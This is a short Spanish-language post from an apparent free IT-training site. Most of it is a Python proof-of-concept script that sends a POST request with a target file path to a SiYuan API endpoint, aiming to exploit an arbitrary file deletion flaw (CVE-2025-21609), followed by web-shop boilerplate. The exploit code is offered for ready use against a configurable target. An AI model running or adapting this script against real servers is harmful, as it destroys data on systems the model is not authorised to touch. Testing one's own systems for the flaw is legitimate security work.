Formacion Informatica Gratis
Para la vulnerabilidad de eliminación arbitraria de archivos en SiYuan (CVE-2025-21609), podemos crear un script que analice y pruebe esta vulnerabilidad. Este script simula el envío de solicitudes POST a la API vulnerable.
import requests
def test_file_deletion(target_url, payload):
"""
Prueba la vulnerabilidad de eliminación arbitraria de archivos en el endpoint afectado.
"""
endpoint = f"{target_url}/api/history/getDocHistoryContent"
headers = {
"Content-Type": "application/json",
}
try:
print(f"Enviando payload al endpoint {endpoint}...")
response = requests.post(endpoint, json=payload, headers=headers)
# Verificar el estado de la respuesta
if response.status_code == 200:
print(f"Solicitud completada. Respuesta: {response.text}")
print("El servidor podría ser vulnerable. Revisa si el archivo objetivo fue eliminado.")
else:
print(f"Error en la solicitud. Código de estado: {response.status_code}")
print("El servidor podría no ser vulnerable o se rechazó la solicitud.")
except Exception as e:
print(f"Error al intentar conectar al servidor: {e}")
# Detalles de la vulnerabilidad
target_url = "http://example.com" # Cambia esto por la URL de tu servidor objetivo
payload = {
"path": "/path/to/target/file.txt" # Ruta del archivo que se intentará eliminar
}
# Ejecutar el análisis
test_file_deletion(target_url, payload)
https://kalisupport.com/tienda/
Tienda – Hak4rKaliLinuxBYgustavolobato We noticed you're visiting from Estados Unidos (EEUU). We've updated our prices to Dólar de los Estados Unidos (US) for your shopping convenience. Use Euro instead. Descartar
Haga clic aquí para reclamar su Entrada Patrocinada.
Categoría
Página web
Dirección
Carrer Nou
Benifayó